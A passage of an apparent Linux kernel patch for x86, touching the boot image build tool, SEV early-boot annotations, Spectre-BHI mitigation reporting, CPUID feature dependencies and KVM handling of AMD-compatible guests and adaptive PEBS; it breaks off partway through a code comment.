+-	update_pecoff_section_header(".reloc", reloc_offset, PECOFF_RELOC_RESERVE);
+-
+-	/*
+-	 * Modify .reloc section contents with a single entry. The
+-	 * relocation is applied to offset 10 of the relocation section.
+-	 */
+-	put_unaligned_le32(reloc_offset + 10, &buf[reloc_offset]);
+-	put_unaligned_le32(10, &buf[reloc_offset + 4]);
+-
+-#ifdef CONFIG_EFI_MIXED
+-	update_pecoff_section_header(".compat", compat_offset, PECOFF_COMPAT_RESERVE);
+-
+-	/*
+-	 * Put the IA-32 machine type (0x14c) and the associated entry point
+-	 * address in the .compat section, so loaders can figure out which other
+-	 * execution modes this image supports.
+-	 */
+-	buf[compat_offset] = 0x1;
+-	buf[compat_offset + 1] = 0x8;
+-	put_unaligned_le16(0x14c, &buf[compat_offset + 2]);
+-	put_unaligned_le32(efi32_pe_entry + size, &buf[compat_offset + 4]);
+-#endif
+-}
+-
+-static void update_pecoff_text(unsigned int text_start, unsigned int file_sz,
+-			       unsigned int init_sz)
+-{
+-	unsigned int pe_header;
+-	unsigned int text_sz = file_sz - text_start;
+-	unsigned int bss_sz = init_sz - file_sz;
+-
+-	pe_header = get_unaligned_le32(&buf[0x3c]);
+-
+-	/*
+-	 * The PE/COFF loader may load the image at an address which is
+-	 * misaligned with respect to the kernel_alignment field in the setup
+-	 * header.
+-	 *
+-	 * In order to avoid relocating the kernel to correct the misalignment,
+-	 * add slack to allow the buffer to be aligned within the declared size
+-	 * of the image.
+-	 */
+-	bss_sz	+= CONFIG_PHYSICAL_ALIGN;
+-	init_sz	+= CONFIG_PHYSICAL_ALIGN;
+-
+-	/*
+-	 * Size of code: Subtract the size of the first sector (512 bytes)
+-	 * which includes the header.
+-	 */
+-	put_unaligned_le32(file_sz - 512 + bss_sz, &buf[pe_header + 0x1c]);
+-
+-	/* Size of image */
+-	put_unaligned_le32(init_sz, &buf[pe_header + 0x50]);
+-
+-	/*
+-	 * Address of entry point for PE/COFF executable
+-	 */
+-	put_unaligned_le32(text_start + efi_pe_entry, &buf[pe_header + 0x28]);
+-
+-	update_pecoff_section_header_fields(".text", text_start, text_sz + bss_sz,
+-					    text_sz, text_start);
+-}
+-
+-static int reserve_pecoff_reloc_section(int c)
+-{
+-	/* Reserve 0x20 bytes for .reloc section */
+-	memset(buf+c, 0, PECOFF_RELOC_RESERVE);
+-	return PECOFF_RELOC_RESERVE;
+-}
+-
+-static void efi_stub_defaults(void)
+-{
+-	/* Defaults for old kernel */
+-#ifdef CONFIG_X86_32
+-	efi_pe_entry = 0x10;
+-#else
+-	efi_pe_entry = 0x210;
+-	startup_64 = 0x200;
+-#endif
+-}
+-
+-static void efi_stub_entry_update(void)
+-{
+-	unsigned long addr = efi32_stub_entry;
+-
+-#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+-#ifdef CONFIG_X86_64
+-	/* Yes, this is really how we defined it :( */
+-	addr = efi64_stub_entry - 0x200;
+-#endif
+-
+-#ifdef CONFIG_EFI_MIXED
+-	if (efi32_stub_entry != addr)
+-		die("32-bit and 64-bit EFI entry points do not match\n");
+-#endif
+-#endif
+-	put_unaligned_le32(addr, &buf[0x264]);
+-}
+-
+-#else
+-
+-static inline void update_pecoff_setup_and_reloc(unsigned int size) {}
+-static inline void update_pecoff_text(unsigned int text_start,
+-				      unsigned int file_sz,
+-				      unsigned int init_sz) {}
+-static inline void efi_stub_defaults(void) {}
+-static inline void efi_stub_entry_update(void) {}
+-
+-static inline int reserve_pecoff_reloc_section(int c)
+-{
+-	return 0;
+-}
+-#endif /* CONFIG_EFI_STUB */
+-
+-static int reserve_pecoff_compat_section(int c)
+-{
+-	/* Reserve 0x20 bytes for .compat section */
+-	memset(buf+c, 0, PECOFF_COMPAT_RESERVE);
+-	return PECOFF_COMPAT_RESERVE;
+-}
+-
+ /*
+  * Parse zoffset.h and find the entry points. We could just #include zoffset.h
+  * but that would mean tools/build would have to be rebuilt every time. It's
+@@ -354,14 +161,7 @@ static void parse_zoffset(char *fname)
+ 	p = (char *)buf;
+ 
+ 	while (p && *p) {
+-		PARSE_ZOFS(p, efi32_stub_entry);
+-		PARSE_ZOFS(p, efi64_stub_entry);
+-		PARSE_ZOFS(p, efi_pe_entry);
+-		PARSE_ZOFS(p, efi32_pe_entry);
+-		PARSE_ZOFS(p, kernel_info);
+-		PARSE_ZOFS(p, startup_64);
+-		PARSE_ZOFS(p, _ehead);
+-		PARSE_ZOFS(p, _end);
++		PARSE_ZOFS(p, _edata);
+ 
+ 		p = strchr(p, '\n');
+ 		while (p && (*p == '\r' || *p == '\n'))
+@@ -371,17 +171,14 @@ static void parse_zoffset(char *fname)
+ 
+ int main(int argc, char ** argv)
+ {
+-	unsigned int i, sz, setup_sectors, init_sz;
++	unsigned int i, sz, setup_sectors;
+ 	int c;
+-	u32 sys_size;
+ 	struct stat sb;
+ 	FILE *file, *dest;
+ 	int fd;
+ 	void *kernel;
+ 	u32 crc = 0xffffffffUL;
+ 
+-	efi_stub_defaults();
+-
+ 	if (argc != 5)
+ 		usage();
+ 	parse_zoffset(argv[3]);
+@@ -403,72 +200,27 @@ int main(int argc, char ** argv)
+ 		die("Boot block hasn't got boot flag (0xAA55)");
+ 	fclose(file);
+ 
+-	c += reserve_pecoff_compat_section(c);
+-	c += reserve_pecoff_reloc_section(c);
+-
+ 	/* Pad unused space with zeros */
+-	setup_sectors = (c + 511) / 512;
++	setup_sectors = (c + 4095) / 4096;
++	setup_sectors *= 8;
+ 	if (setup_sectors < SETUP_SECT_MIN)
+ 		setup_sectors = SETUP_SECT_MIN;
+ 	i = setup_sectors*512;
+ 	memset(buf+c, 0, i-c);
+ 
+-	update_pecoff_setup_and_reloc(i);
+-
+-	/* Set the default root device */
+-	put_unaligned_le16(DEFAULT_ROOT_DEV, &buf[508]);
+-
+ 	/* Open and stat the kernel file */
+ 	fd = open(argv[2], O_RDONLY);
+ 	if (fd < 0)
+ 		die("Unable to open `%s': %m", argv[2]);
+ 	if (fstat(fd, &sb))
+ 		die("Unable to stat `%s': %m", argv[2]);
+-	sz = sb.st_size;
++	if (_edata != sb.st_size)
++		die("Unexpected file size `%s': %u != %u", argv[2], _edata,
++		    sb.st_size);
++	sz = _edata - 4;
+ 	kernel = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0);
+ 	if (kernel == MAP_FAILED)
+ 		die("Unable to mmap '%s': %m", argv[2]);
+-	/* Number of 16-byte paragraphs, including space for a 4-byte CRC */
+-	sys_size = (sz + 15 + 4) / 16;
+-#ifdef CONFIG_EFI_STUB
+-	/*
+-	 * COFF requires minimum 32-byte alignment of sections, and
+-	 * adding a signature is problematic without that alignment.
+-	 */
+-	sys_size = (sys_size + 1) & ~1;
+-#endif
+-
+-	/* Patch the setup code with the appropriate size parameters */
+-	buf[0x1f1] = setup_sectors-1;
+-	put_unaligned_le32(sys_size, &buf[0x1f4]);
+-
+-	init_sz = get_unaligned_le32(&buf[0x260]);
+-#ifdef CONFIG_EFI_STUB
+-	/*
+-	 * The decompression buffer will start at ImageBase. When relocating
+-	 * the compressed kernel to its end, we must ensure that the head
+-	 * section does not get overwritten.  The head section occupies
+-	 * [i, i + _ehead), and the destination is [init_sz - _end, init_sz).
+-	 *
+-	 * At present these should never overlap, because 'i' is at most 32k
+-	 * because of SETUP_SECT_MAX, '_ehead' is less than 1k, and the
+-	 * calculation of INIT_SIZE in boot/header.S ensures that
+-	 * 'init_sz - _end' is at least 64k.
+-	 *
+-	 * For future-proofing, increase init_sz if necessary.
+-	 */
+-
+-	if (init_sz - _end < i + _ehead) {
+-		init_sz = (i + _ehead + _end + 4095) & ~4095;
+-		put_unaligned_le32(init_sz, &buf[0x260]);
+-	}
+-#endif
+-	update_pecoff_text(setup_sectors * 512, i + (sys_size * 16), init_sz);
+-
+-	efi_stub_entry_update();
+-
+-	/* Update kernel_info offset. */
+-	put_unaligned_le32(kernel_info, &buf[0x268]);
+ 
+ 	crc = partial_crc32(buf, i, crc);
+ 	if (fwrite(buf, 1, i, dest) != i)
+@@ -479,13 +231,6 @@ int main(int argc, char ** argv)
+ 	if (fwrite(kernel, 1, sz, dest) != sz)
+ 		die("Writing kernel failed");
+ 
+-	/* Add padding leaving 4 bytes for the checksum */
+-	while (sz++ < (sys_size*16) - 4) {
+-		crc = partial_crc32_one('\0', crc);
+-		if (fwrite("\0", 1, 1, dest) != 1)
+-			die("Writing padding failed");
+-	}
+-
+ 	/* Write the CRC */
+ 	put_unaligned_le32(crc, buf);
+ 	if (fwrite(buf, 1, 4, dest) != 4)
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index a38cc0afc90a0..a3e0be0470a40 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -81,6 +81,7 @@
+ 
+ #ifndef __ASSEMBLY__
+ extern unsigned int output_len;
++extern const unsigned long kernel_text_size;
+ extern const unsigned long kernel_total_size;
+ 
+ unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
+diff --git a/arch/x86/include/asm/init.h b/arch/x86/include/asm/init.h
+index 5f1d3c421f686..cc9ccf61b6bd1 100644
+--- a/arch/x86/include/asm/init.h
++++ b/arch/x86/include/asm/init.h
+@@ -2,6 +2,8 @@
+ #ifndef _ASM_X86_INIT_H
+ #define _ASM_X86_INIT_H
+ 
++#define __head	__section(".head.text")
++
+ struct x86_mapping_info {
+ 	void *(*alloc_pgt_page)(void *); /* allocate buf for page table */
+ 	void *context;			 /* context for alloc_pgt_page */
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index dfcdcafe3a2cd..887a171488ea2 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -773,6 +773,7 @@ struct kvm_vcpu_arch {
+ 	int cpuid_nent;
+ 	struct kvm_cpuid_entry2 *cpuid_entries;
+ 	u32 kvm_cpuid_base;
++	bool is_amd_compatible;
+ 
+ 	u64 reserved_gpa_bits;
+ 	int maxphyaddr;
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 41d06822bc8cd..853f423b1d138 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -46,8 +46,8 @@ void __init sme_unmap_bootdata(char *real_mode_data);
+ void __init sme_early_init(void);
+ void __init sev_setup_arch(void);
+ 
+-void __init sme_encrypt_kernel(struct boot_params *bp);
+-void __init sme_enable(struct boot_params *bp);
++void sme_encrypt_kernel(struct boot_params *bp);
++void sme_enable(struct boot_params *bp);
+ 
+ int __init early_set_memory_decrypted(unsigned long vaddr, unsigned long size);
+ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size);
+@@ -80,8 +80,8 @@ static inline void __init sme_unmap_bootdata(char *real_mode_data) { }
+ static inline void __init sme_early_init(void) { }
+ static inline void __init sev_setup_arch(void) { }
+ 
+-static inline void __init sme_encrypt_kernel(struct boot_params *bp) { }
+-static inline void __init sme_enable(struct boot_params *bp) { }
++static inline void sme_encrypt_kernel(struct boot_params *bp) { }
++static inline void sme_enable(struct boot_params *bp) { }
+ 
+ static inline void sev_es_init_vc_handling(void) { }
+ 
+diff --git a/arch/x86/include/asm/page_types.h b/arch/x86/include/asm/page_types.h
+index a506a411474d4..86bd4311daf8a 100644
+--- a/arch/x86/include/asm/page_types.h
++++ b/arch/x86/include/asm/page_types.h
+@@ -11,20 +11,14 @@
+ #define PAGE_SIZE		(_AC(1,UL) << PAGE_SHIFT)
+ #define PAGE_MASK		(~(PAGE_SIZE-1))
+ 
+-#define PMD_PAGE_SIZE		(_AC(1, UL) << PMD_SHIFT)
+-#define PMD_PAGE_MASK		(~(PMD_PAGE_SIZE-1))
+-
+-#define PUD_PAGE_SIZE		(_AC(1, UL) << PUD_SHIFT)
+-#define PUD_PAGE_MASK		(~(PUD_PAGE_SIZE-1))
+-
+ #define __VIRTUAL_MASK		((1UL << __VIRTUAL_MASK_SHIFT) - 1)
+ 
+-/* Cast *PAGE_MASK to a signed type so that it is sign-extended if
++/* Cast P*D_MASK to a signed type so that it is sign-extended if
+    virtual addresses are 32-bits but physical addresses are larger
+    (ie, 32-bit PAE). */
+ #define PHYSICAL_PAGE_MASK	(((signed long)PAGE_MASK) & __PHYSICAL_MASK)
+-#define PHYSICAL_PMD_PAGE_MASK	(((signed long)PMD_PAGE_MASK) & __PHYSICAL_MASK)
+-#define PHYSICAL_PUD_PAGE_MASK	(((signed long)PUD_PAGE_MASK) & __PHYSICAL_MASK)
++#define PHYSICAL_PMD_PAGE_MASK	(((signed long)PMD_MASK) & __PHYSICAL_MASK)
++#define PHYSICAL_PUD_PAGE_MASK	(((signed long)PUD_MASK) & __PHYSICAL_MASK)
+ 
+ #define HPAGE_SHIFT		PMD_SHIFT
+ #define HPAGE_SIZE		(_AC(1,UL) << HPAGE_SHIFT)
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index c57dd21155bd7..bcac2e53d50bb 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -192,15 +192,15 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ struct snp_guest_request_ioctl;
+ 
+ void setup_ghcb(void);
+-void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned long npages);
+-void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned long npages);
++void early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
++				  unsigned long npages);
++void early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
++				 unsigned long npages);
+ void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
+ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+-void __init __noreturn snp_abort(void);
++void __noreturn snp_abort(void);
+ void snp_dmi_setup(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ u64 snp_get_unsupported_features(u64 status);
+diff --git a/arch/x86/kernel/amd_gart_64.c b/arch/x86/kernel/amd_gart_64.c
+index 19a0207e529fe..56a917df410d3 100644
+--- a/arch/x86/kernel/amd_gart_64.c
++++ b/arch/x86/kernel/amd_gart_64.c
+@@ -504,7 +504,7 @@ static __init unsigned long check_iommu_size(unsigned long aper, u64 aper_size)
+ 	}
+ 
+ 	a = aper + iommu_size;
+-	iommu_size -= round_up(a, PMD_PAGE_SIZE) - a;
++	iommu_size -= round_up(a, PMD_SIZE) - a;
+ 
+ 	if (iommu_size < 64*1024*1024) {
+ 		pr_warn("PCI-DMA: Warning: Small IOMMU %luMB."
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 6d69123de3660..3f38592ec7713 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1629,7 +1629,8 @@ static void __init bhi_select_mitigation(void)
+ 		return;
+ 
+ 	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
+-	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE)) {
++	if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++	    !boot_cpu_has(X86_FEATURE_RETPOLINE_LFENCE)) {
+ 		spec_ctrl_disable_kernel_rrsba();
+ 		if (rrsba_disabled)
+ 			return;
+@@ -2783,11 +2784,13 @@ static const char *spectre_bhi_state(void)
+ {
+ 	if (!boot_cpu_has_bug(X86_BUG_BHI))
+ 		return "; BHI: Not affected";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
+ 		return "; BHI: BHI_DIS_S";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
+ 		return "; BHI: SW loop, KVM: SW loop";
+-	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) && rrsba_disabled)
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++		 !boot_cpu_has(X86_FEATURE_RETPOLINE_LFENCE) &&
++		 rrsba_disabled)
+ 		return "; BHI: Retpoline";
+ 	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
+ 		return "; BHI: Vulnerable, KVM: SW loop";
+diff --git a/arch/x86/kernel/cpu/cpuid-deps.c b/arch/x86/kernel/cpu/cpuid-deps.c
+index c881bcafba7d7..9c19f40b1b272 100644
+--- a/arch/x86/kernel/cpu/cpuid-deps.c
++++ b/arch/x86/kernel/cpu/cpuid-deps.c
+@@ -44,7 +44,10 @@ static const struct cpuid_dep cpuid_deps[] = {
+ 	{ X86_FEATURE_F16C,			X86_FEATURE_XMM2,     },
+ 	{ X86_FEATURE_AES,			X86_FEATURE_XMM2      },
+ 	{ X86_FEATURE_SHA_NI,			X86_FEATURE_XMM2      },
++	{ X86_FEATURE_GFNI,			X86_FEATURE_XMM2      },
+ 	{ X86_FEATURE_FMA,			X86_FEATURE_AVX       },
++	{ X86_FEATURE_VAES,			X86_FEATURE_AVX       },
++	{ X86_FEATURE_VPCLMULQDQ,		X86_FEATURE_AVX       },
+ 	{ X86_FEATURE_AVX2,			X86_FEATURE_AVX,      },
+ 	{ X86_FEATURE_AVX512F,			X86_FEATURE_AVX,      },
+ 	{ X86_FEATURE_AVX512IFMA,		X86_FEATURE_AVX512F   },
+@@ -56,9 +59,6 @@ static const struct cpuid_dep cpuid_deps[] = {
+ 	{ X86_FEATURE_AVX512VL,			X86_FEATURE_AVX512F   },
+ 	{ X86_FEATURE_AVX512VBMI,		X86_FEATURE_AVX512F   },
+ 	{ X86_FEATURE_AVX512_VBMI2,		X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_GFNI,			X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_VAES,			X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_VPCLMULQDQ,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_VNNI,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_BITALG,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_4VNNIW,		X86_FEATURE_AVX512F   },
+diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c
+index 84adf12a76d3c..4fae511b2e2b2 100644
+--- a/arch/x86/kernel/head64.c
++++ b/arch/x86/kernel/head64.c
+@@ -41,6 +41,7 @@
+ #include <asm/trapnr.h>
+ #include <asm/sev.h>
+ #include <asm/tdx.h>
++#include <asm/init.h>
+ 
+ /*
+  * Manage page tables very early on.
+@@ -84,8 +85,6 @@ static struct desc_ptr startup_gdt_descr = {
+ 	.address = 0,
+ };
+ 
+-#define __head	__section(".head.text")
+-
+ static void __head *fixup_pointer(void *ptr, unsigned long physaddr)
+ {
+ 	return ptr - (void *)_text + (void *)physaddr;
+@@ -203,7 +202,7 @@ unsigned long __head __startup_64(unsigned long physaddr,
+ 	load_delta = physaddr - (unsigned long)(_text - __START_KERNEL_map);
+ 
+ 	/* Is the address not 2M aligned? */
+-	if (load_delta & ~PMD_PAGE_MASK)
++	if (load_delta & ~PMD_MASK)
+ 		for (;;);
+ 
+ 	/* Include the SME encryption mask in the fixup value */
+@@ -588,7 +587,7 @@ static void set_bringup_idt_handler(gate_desc *idt, int n, void *handler)
+ }
+ 
+ /* This runs while still in the direct mapping */
+-static void startup_64_load_idt(unsigned long physbase)
++static void __head startup_64_load_idt(unsigned long physbase)
+ {
+ 	struct desc_ptr *desc = fixup_pointer(&bringup_idt_descr, physbase);
+ 	gate_desc *idt = fixup_pointer(bringup_idt_table, physbase);
+diff --git a/arch/x86/kernel/platform-quirks.c b/arch/x86/kernel/platform-quirks.c
+index b348a672f71d5..b525fe6d66571 100644
+--- a/arch/x86/kernel/platform-quirks.c
++++ b/arch/x86/kernel/platform-quirks.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/kernel.h>
+ #include <linux/init.h>
++#include <linux/pnp.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/bios_ebda.h>
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 271e70d5748ef..3fe76bf17d95e 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -86,7 +86,8 @@ static bool __init sev_es_check_cpu_features(void)
+ 	return true;
+ }
+ 
+-static void __noreturn sev_es_terminate(unsigned int set, unsigned int reason)
++static void __head __noreturn
++sev_es_terminate(unsigned int set, unsigned int reason)
+ {
+ 	u64 val = GHCB_MSR_TERM_REQ;
+ 
+@@ -323,13 +324,7 @@ static int sev_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid
+  */
+ static const struct snp_cpuid_table *snp_cpuid_get_table(void)
+ {
+-	void *ptr;
+-
+-	asm ("lea cpuid_table_copy(%%rip), %0"
+-	     : "=r" (ptr)
+-	     : "p" (&cpuid_table_copy));
+-
+-	return ptr;
++	return &RIP_REL_REF(cpuid_table_copy);
+ }
+ 
+ /*
+@@ -388,7 +383,7 @@ static u32 snp_cpuid_calc_xsave_size(u64 xfeatures_en, bool compacted)
+ 	return xsave_size;
+ }
+ 
+-static bool
++static bool __head
+ snp_cpuid_get_validated_func(struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+@@ -525,7 +520,8 @@ static int snp_cpuid_postprocess(struct ghcb *ghcb, struct es_em_ctxt *ctxt,
+  * Returns -EOPNOTSUPP if feature not enabled. Any other non-zero return value
+  * should be treated as fatal by caller.
+  */
+-static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++static int __head
++snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+ 
+@@ -567,7 +563,7 @@ static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_le
+  * page yet, so it only supports the MSR based communication with the
+  * hypervisor and only the CPUID exit-code.
+  */
+-void __init do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
++void __head do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
+ {
+ 	unsigned int subfn = lower_bits(regs->cx, 32);
+ 	unsigned int fn = lower_bits(regs->ax, 32);
+@@ -1013,7 +1009,8 @@ struct cc_setup_data {
+  * Search for a Confidential Computing blob passed in as a setup_data entry
+  * via the Linux Boot Protocol.
+  */
+-static struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
++static __head
++struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
+ {
+ 	struct cc_setup_data *sd = NULL;
+ 	struct setup_data *hdr;
+@@ -1040,7 +1037,7 @@ static struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
+  * mapping needs to be updated in sync with all the changes to virtual memory
+  * layout and related mapping facilities throughout the boot process.
+  */
+-static void __init setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
++static void __head setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
+ {
+ 	const struct snp_cpuid_table *cpuid_table_fw, *cpuid_table;
+ 	int i;
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index e35fcc8d4bae4..f8a8249ae1177 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -26,6 +26,7 @@
+ #include <linux/dmi.h>
+ #include <uapi/linux/sev-guest.h>
+ 
++#include <asm/init.h>
+ #include <asm/cpu_entry_area.h>
+ #include <asm/stacktrace.h>
+ #include <asm/sev.h>
+@@ -690,7 +691,7 @@ static void pvalidate_pages(unsigned long vaddr, unsigned long npages, bool vali
+ 	}
+ }
+ 
+-static void __init early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
++static void __head early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
+ {
+ 	unsigned long paddr_end;
+ 	u64 val;
+@@ -728,7 +729,7 @@ static void __init early_set_pages_state(unsigned long paddr, unsigned long npag
+ 	sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_PSC);
+ }
+ 
+-void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
++void __head early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+ 					 unsigned long npages)
+ {
+ 	/*
+@@ -2085,7 +2086,7 @@ bool __init handle_vc_boot_ghcb(struct pt_regs *regs)
+  *
+  * Scan for the blob in that order.
+  */
+-static __init struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
++static __head struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
+ {
+ 	struct cc_blob_sev_info *cc_info;
+ 
+@@ -2111,7 +2112,7 @@ static __init struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
+ 	return cc_info;
+ }
+ 
+-bool __init snp_init(struct boot_params *bp)
++bool __head snp_init(struct boot_params *bp)
+ {
+ 	struct cc_blob_sev_info *cc_info;
+ 
+@@ -2133,7 +2134,7 @@ bool __init snp_init(struct boot_params *bp)
+ 	return true;
+ }
+ 
+-void __init __noreturn snp_abort(void)
++void __head __noreturn snp_abort(void)
+ {
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+ }
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 62a44455c51d0..f02961cbbb75a 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -340,6 +340,7 @@ static void kvm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 
+ 	kvm_update_pv_runtime(vcpu);
+ 
++	vcpu->arch.is_amd_compatible = guest_cpuid_is_amd_or_hygon(vcpu);
+ 	vcpu->arch.maxphyaddr = cpuid_query_maxphyaddr(vcpu);
+ 	vcpu->arch.reserved_gpa_bits = kvm_vcpu_reserved_gpa_bits_raw(vcpu);
+ 
+diff --git a/arch/x86/kvm/cpuid.h b/arch/x86/kvm/cpuid.h
+index b1658c0de847c..18fd2e845989a 100644
+--- a/arch/x86/kvm/cpuid.h
++++ b/arch/x86/kvm/cpuid.h
+@@ -125,6 +125,16 @@ static inline bool guest_cpuid_is_intel(struct kvm_vcpu *vcpu)
+ 	return best && is_guest_vendor_intel(best->ebx, best->ecx, best->edx);
+ }
+ 
++static inline bool guest_cpuid_is_amd_compatible(struct kvm_vcpu *vcpu)
++{
++	return vcpu->arch.is_amd_compatible;
++}
++
++static inline bool guest_cpuid_is_intel_compatible(struct kvm_vcpu *vcpu)
++{
++	return !guest_cpuid_is_amd_compatible(vcpu);
++}
++
+ static inline int guest_cpuid_family(struct kvm_vcpu *vcpu)
+ {
+ 	struct kvm_cpuid_entry2 *best;
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index bfeafe4855528..c90fef0258c51 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2548,7 +2548,8 @@ int kvm_apic_local_deliver(struct kvm_lapic *apic, int lvt_type)
+ 		trig_mode = reg & APIC_LVT_LEVEL_TRIGGER;
+ 
+ 		r = __apic_accept_irq(apic, mode, vector, 1, trig_mode, NULL);
+-		if (r && lvt_type == APIC_LVTPC)
++		if (r && lvt_type == APIC_LVTPC &&
++		    guest_cpuid_is_intel_compatible(apic->vcpu))
+ 			kvm_lapic_set_reg(apic, APIC_LVTPC, reg | APIC_LVT_MASKED);
+ 		return r;
+ 	}
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index d30325e297a03..13134954e24df 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -4649,7 +4649,7 @@ static void reset_guest_rsvds_bits_mask(struct kvm_vcpu *vcpu,
+ 				context->cpu_role.base.level, is_efer_nx(context),
+ 				guest_can_use_gbpages(vcpu),
+ 				is_cr4_pse(context),
+-				guest_cpuid_is_amd_or_hygon(vcpu));
++				guest_cpuid_is_amd_compatible(vcpu));
+ }
+ 
+ static void
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 5c1590855ffcd..10aff2c9a4e4c 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7742,8 +7742,28 @@ static u64 vmx_get_perf_capabilities(void)
+ 
+ 	if (vmx_pebs_supported()) {
+ 		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+-		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
+-			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
++
++		/*
++		 * Disallow adaptive PEBS as it is functionally broken, can be
++		 * used by the guest to read *host* LBRs, and can be used to
++		 * bypass userspace event filters.  To correctly and safely
++		 * support adaptive PEBS, KVM needs to:
++		 *
++		 * 1. Account for the ADAPTIVE flag when (re)programming fixed
++		 *    counters.
++		 *
++		 * 2. Gain support from perf (or take direct control of counter
++		 *    programming) to support events without adaptive PEBS
++		 *    enabled for the hardware counter.
++		 *
++		 * 3. Ensure LBR MSRs cannot hold host data on VM-Entry with
